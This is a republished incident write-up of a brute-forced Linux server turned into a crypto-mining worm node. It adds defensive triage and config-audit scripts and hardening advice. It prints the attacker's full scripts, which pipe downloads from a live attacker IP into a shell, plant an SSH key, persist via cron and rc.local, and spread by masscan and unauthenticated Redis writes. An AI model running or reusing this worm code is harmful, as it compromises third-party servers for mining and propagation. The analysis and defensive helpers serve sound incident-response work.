
Remember the whole process that Linux was invaded and the server became a "mining machine".

2025-02-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

As soon as I arrived at the office on Monday morning I heard a colleague say that one of the servers could not be logged into. I didn't take it to heart and carried on with breakfast, checking whether the coin price had dropped again.

Soon the operations colleagues arrived too, out of breath: one of our servers had been frozen by Alibaba Cloud (Aliyun). Reason given: sending malicious packets to the outside world.

I tried SSH; the connection was refused. Asking around, the default port 22 had been blocked.

I had operations change the SSH port, connected straight away and looked at the login: root, with a weak password of fewer than 8 characters. My heart sank: we had been hacked!

Look for clues

The server ran CentOS 6.x with Nginx, Tomcat and Redis deployed. I first backed up the database locally, then ran top. Two processes with the same name, gpg-agentd, were each pinned at 99% CPU.

Googling GPG turned up gpg-agent, the daemon GnuPG provides; it can also serve the SSH protocol and greatly simplifies key management.

It looks like a legitimate program, but look closely at the process name on the server: it carries an extra letter d at the end. A neat disguise, reminiscent of Windows malware that names itself to look like svchost.exe.

Continue the investigation:

ps -eo command -p 23374
netstat -pan | grep 23374

These show the launch path and network connections of PID 23374 and lead to the directory in figure 1, where the binary executable the attacker left behind was found.

Two questions remained:

How was the file uploaded?

What does this file do; in other words, what does the attacker want?

Running history showed nothing useful: all records had been wiped, leaving no trace. Next, the system log: more /var/log/messages

Around 12:00 at night a lot of software had been installed on the server. Several of the packages caught my attention; I'll come back to them in more detail below.

Think like the attacker: if you wanted your code to keep running automatically, where would you put it? Something that starts on a schedule. Yes, a scheduled task:

crontab -e

Sure enough, the clue was there.
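The checks above (cron spools, rc.local, authorized_keys, CPU hogs and their real binary path, failed logins from lastb) scripted as a triage helper. This is an added example, not part of the original write-up; the ROOT prefix and the persistence paths it walks are assumptions so it can run against a mounted disk image or a constructed test tree as well as the live box.

```shell
#!/bin/sh
# Triage helper for a suspected cron / SSH-key persistence case.
# Added example, not part of the original article.
# ROOT is an assumed prefix: "" for the live system, or the mount point of
# an image / a constructed test tree for offline review.
ROOT="${ROOT:-}"

# Print lines that pipe a download straight into a shell; the worm's cron
# and rc.local entries all look like "curl ... | sh" or "wget -O- ... | sh".
find_download_to_shell() {
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$1" 2>/dev/null
}

# Walk the persistence locations the write-up found abused.
# Returns 0 if anything suspicious was printed, 1 if the tree looks clean.
scan_persistence() {
    found=1
    for f in "$ROOT/var/spool/cron/root" "$ROOT/var/spool/cron/crontabs/root" \
             "$ROOT/etc/rc.local" "$ROOT/etc/crontab" "$ROOT"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        if find_download_to_shell "$f" >/dev/null; then
            echo "SUSPICIOUS: $f"
            find_download_to_shell "$f" | sed 's/^/    /'
            found=0
        fi
    done
    return $found
}

# Show every authorized key with its comment so a foreign one (the worm's
# key is commented "RedisX") stands out; keys without a comment are flagged.
list_authorized_keys() {
    for f in "$ROOT/root/.ssh/authorized_keys" "$ROOT"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        awk -v f="$f" 'NF >= 2 { print f ": " $1 " " (NF > 2 ? $NF : "(no comment)") }' "$f"
    done
}

# Checks that only make sense on the live system: top CPU consumers, where
# the gpg-agentd binary really lives, its sockets, and who hammered SSH.
live_checks() {
    ps -eo pid,pcpu,user,comm,args --sort=-pcpu | head -n 6
    for pid in $(ps -eo pid,comm | awk '$2 == "gpg-agentd" { print $1 }'); do
        echo "gpg-agentd pid $pid exe: $(readlink "/proc/$pid/exe")"
        (ss -pant 2>/dev/null || netstat -pant 2>/dev/null) | grep -E "pid=$pid|$pid/"
    done
    lastb 2>/dev/null | awk 'NF > 2 { print $3 }' | sort | uniq -c | sort -rn | head -n 10
}
```

Source the file and call scan_persistence and list_authorized_keys first; they are read-only and work on an offline image. Run live_checks only on the compromised host itself, and do it before killing the processes so the /proc exe link is still there.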

The attacker's motive

The scheduled task above downloads a script from the attacker's server every 15 minutes and executes it.

Let's download the script and take a look:

curl -fsSL 159.89.190.243/ash.php > ash.sh

The script reads as follows:

uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh4inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx RedisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php | sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php | sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php | bash' 2>/dev/null

A rough analysis of what the script does: it first disables SELinux (setenforce 0) and raises the shell's file-descriptor and process limits, wipes every existing crontab, then writes the attacker's SSH public key (comment: RedisX) into /root/.ssh/authorized_keys.

From then on the attacker can log in to this server as root without a password, which makes executing further scripts much more convenient. The script also re-creates the cron entries that refetch ash.php every 15 and every 20 minutes, so the foothold survives even if one copy is removed.

Next it makes sure bash is installed via whichever package manager exists, and finally downloads and executes a second script, bsh.php. Downloading and analyzing bsh.php:

sleep $(seq 3 7 | sort -R | head -n1)
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/...
sleep 1
if [ -f .watch ]; then
    rm -rf .watch
    exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if ! [ -x /usr/bin/gpg-agentd ]; then
    curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
    echo '/usr/bin/gpg-agentd' > /etc/rc.local
    echo 'curl -fsSL 159.89.190.243/ash.php | sh' >> /etc/rc.local
    echo 'exit 0' >> /etc/rc.local
fi
sleep 1
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if ! [ -x "$(command -v masscan)" ]; then
    rm -rf /var/lib/apt/lists/*
    rm -rf x1.tar.gz
    if [ -x "$(command -v apt-get)" ]; then
        export DEBIAN_FRONTEND=noninteractive
        apt-get update -y
        apt-get install -y debconf-doc
        apt-get install -y build-essential
        apt-get install -y libpcap0.8-dev libpcap0.8
        apt-get install -y libpcap*
        apt-get install -y make gcc git
        apt-get install -y redis-server
        apt-get install -y redis-tools
        apt-get install -y redis
        apt-get install -y iptables
        apt-get install -y wget curl
    fi
    if [ -x "$(command -v yum)" ]; then
        yum update -y
        yum install -y epel-release
        yum update -y
        yum install -y git iptables make gcc redis libpcap libpcap-devel
        yum install -y wget curl
    fi
    sleep 1
    curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
    sleep 1
    [ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
fi
sleep 3 && rm -rf .watch
bash -c 'curl -fsSL 159.89.190.243/rsh.php | bash' 2>/dev/null

The script is long, but it has four main functions:

Download the remote binary (served as dump.db) to /usr/bin/gpg-agentd, make it executable with chmod +x and run it.

Modify /etc/rc.local so the binary, and a fresh fetch of ash.php, run automatically at boot.

Install build dependencies and the open-source masscan scanner from GitHub. These are the package installs I saw in /var/log/messages above.

Download the third script, rsh.php, and execute it.

Along the way it also kills competing scanners and miners (redisscan, masscan, xig and others) and uses a .watch lock file in a hidden .ICE-unix/... directory so only one copy runs at a time.

I went to GitHub to look at the scanner:

masscan advertises "Transmitting 10 Million Packets Per Second", faster than nmap. That makes it easy to understand why Alibaba Cloud froze the server.

After skimming the README I didn't dig further and went on to download the third script:

setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "
*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh
"' >> .dat
echo 'set backup2 "
*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh
"' >> .dat
echo 'set backup3 "
*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh
"' >> .dat
echo 'set backup4 "
*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh
"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
sleep 1
masscan --max-rate 10000 -p6379,6380 --shard $(seq 1 22000 | sort -R | head -n1)/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4,1,length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4,1,length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}\.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379,6380 -iL .inet | awk '{print $6, substr($4,1,length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null

If the first two scripts only download and execute binaries on the server, this one shows the real power of the worm. Let's analyze it.

The environment changes at the top need no comment, except for the iptables rules: they allow port 6379 only from 127.0.0.1, which locks other attackers out of this victim's Redis. The file writes that follow will look familiar to anyone who has used Redis: .dat is a batch of redis-cli commands.

The trick is that an unauthenticated Redis instance lets any client run CONFIG SET dir and CONFIG SET dbfilename and then SAVE, so the RDB dump lands at any path the Redis process can write. Here the keys backup1 to backup4 hold cron lines padded with newlines, and the dump is saved as /var/spool/cron/root and /var/spool/cron/crontabs/root. cron skips the binary junk around those lines and runs them, so the new victim fetches ash.php every 2 to 5 minutes. ash.php is the script that writes the attacker's public key into /root/.ssh/authorized_keys, as we saw at the start of this article, so the attacker also gets passwordless root SSH with the matching private key.

With the payload prepared, masscan scans for Redis across a random 1/22000 shard of the whole IPv4 space, then a few hard-coded /16 ranges, then the /16 networks the host itself sits on, and the payload is piped through redis-cli into every open instance found.

Note that 6379 is the default port of the Redis server. If your Redis listens on a public IP or 0.0.0.0 and has no password, sorry, you will be hit.

Summary

Analyzing these three scripts in turn shows how nasty the worm is. First it obtains login access by writing an SSH public key, then it downloads and executes a remote binary, and finally it replicates through unauthenticated Redis, spreading across the network and growing at an exponential rate.

So the question is, how did this server get hit? A look at redis.conf: bind is 127.0.0.1, so Redis was not the way in.

The inference is that the root account was brute-forced over SSH. To verify that I ran lastb, and sure enough, there are a large number of failed login records:

One last question remained: what exactly is this gpg-agentd program for? My first reaction was a miner, because digital currency is so hot right now that the demand for distributed mining rigs has spawned this whole grey industry.

So I dragged gpg-agentd into IDA and searched the strings for bitcoin, eth, mine and similar words, and finally found this:

Open nicehash.com and take a look, and everything becomes clear: it is a mining client for the NiceHash marketplace.

Security recommendations

Server:

Disable direct root login over SSH (PermitRootLogin no)

Make user names and passwords as complex as possible

Change the default SSH port 22

Install DenyHosts or similar anti-brute-force software

Disable password login (PasswordAuthentication no) and log in with public keys instead

Redis:

Never bind Redis to a public IP or 0.0.0.0; bind to 127.0.0.1 and keep protected-mode on

Set requirepass so Redis requires a password

Run Redis as a low-privilege account, so CONFIG SET dir cannot point SAVE at root's crontab or /root/.ssh
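The propagation mechanism above and the recommendations just listed come down to a handful of settings, so here is an added example (not from the article) that audits a redis.conf and an sshd_config for exactly those: it flags the configuration the worm's masscan-plus-redis-cli step needs (bind on a non-loopback address, no requirepass, CONFIG still callable) and the configuration the brute-force in lastb needed (root login, password auth, port 22). The sample configs are constructed for illustration, and the defaults assumed for unset sshd directives are the CentOS 6 ones.

```shell
#!/bin/sh
# Audit redis.conf and sshd_config against the recommendations above.
# Added example, not from the article; the sample configs are constructed.

# First uncommented value of a directive in a "key value" style config,
# case-insensitive on the key; empty output if the directive is absent.
conf_directive() {
    awk -v k="$2" 'tolower($1) == k { sub(/^[^ \t]+[ \t]+/, ""); print; exit }' "$1"
}

# One line per weakness the worm relies on. Bound to a public address (or
# unbound), no requirepass, and a reachable CONFIG command together let
# "config set dir /var/spool/cron" + "save" drop a crontab on the box.
audit_redis() {
    f="$1"
    bind=$(conf_directive "$f" bind)
    if [ -z "$bind" ]; then
        echo "bind: unset, Redis listens on every interface"
    else
        for a in $bind; do
            case "$a" in
                127.0.0.1|::1|-127.0.0.1|-::1|localhost) ;;
                *) echo "bind: non-loopback address $a" ;;
            esac
        done
    fi
    if [ "$(conf_directive "$f" protected-mode)" = "no" ]; then
        echo "protected-mode: no"
    fi
    if [ -z "$(conf_directive "$f" requirepass)" ]; then
        echo "requirepass: unset, any client can run CONFIG SET and SAVE"
    fi
    if ! grep -qiE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$f"; then
        echo "rename-command: CONFIG not renamed or disabled"
    fi
}

# Same idea for sshd. Assumed defaults when a directive is unset are the
# CentOS 6 ones: PermitRootLogin yes, PasswordAuthentication yes, Port 22.
audit_sshd() {
    f="$1"
    case "$(conf_directive "$f" permitrootlogin | tr 'A-Z' 'a-z')" in
        no|prohibit-password|without-password) ;;
        *) echo "PermitRootLogin: root can log in over SSH" ;;
    esac
    if [ "$(conf_directive "$f" passwordauthentication | tr 'A-Z' 'a-z')" != "no" ]; then
        echo "PasswordAuthentication: password login allowed"
    fi
    p=$(conf_directive "$f" port)
    if [ -z "$p" ] || [ "$p" = "22" ]; then
        echo "Port: default 22"
    fi
}

# Number of findings; $1 is "redis" or "sshd", $2 the config file.
finding_count() {
    "audit_$1" "$2" | awk 'END { print NR }'
}

# Constructed samples: the exposed setup the worm looks for ...
weak_samples() {
    printf '%s\n' 'bind 0.0.0.0' 'protected-mode no' 'port 6379' > "$1/weak.redis"
    printf '%s\n' 'Port 22' 'PermitRootLogin yes' 'PasswordAuthentication yes' > "$1/weak.sshd"
}

# ... and the recommendations applied. Running Redis as an unprivileged user
# is not visible in the conf file; check it with ps -o user -C redis-server.
hardened_samples() {
    printf '%s\n' 'bind 127.0.0.1 ::1' 'protected-mode yes' 'port 6379' \
        'requirepass "replace-with-a-long-random-secret"' \
        'rename-command CONFIG ""' > "$1/good.redis"
    printf '%s\n' 'Port 2222' 'PermitRootLogin no' 'PasswordAuthentication no' \
        'PubkeyAuthentication yes' > "$1/good.sshd"
}
```

Against the constructed weak files audit_redis reports four findings and audit_sshd three; against the hardened ones both report none. On a real host run audit_redis /etc/redis.conf and audit_sshd /etc/ssh/sshd_config, and remember that a Redis still exposed after this check is reachable by the same masscan sweep the third script runs.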

At this point the whole intrusion has been more or less worked through. If you are interested in the samples you can fetch them with curl, or run the scripts above inside a throwaway virtual machine. Given my limited ability, there are bound to be oversights or mistakes in this article.

Source: Kanxue Forum (看雪论坛), author Hefe


© 2024 shulou.com SLNews company. All rights reserved.
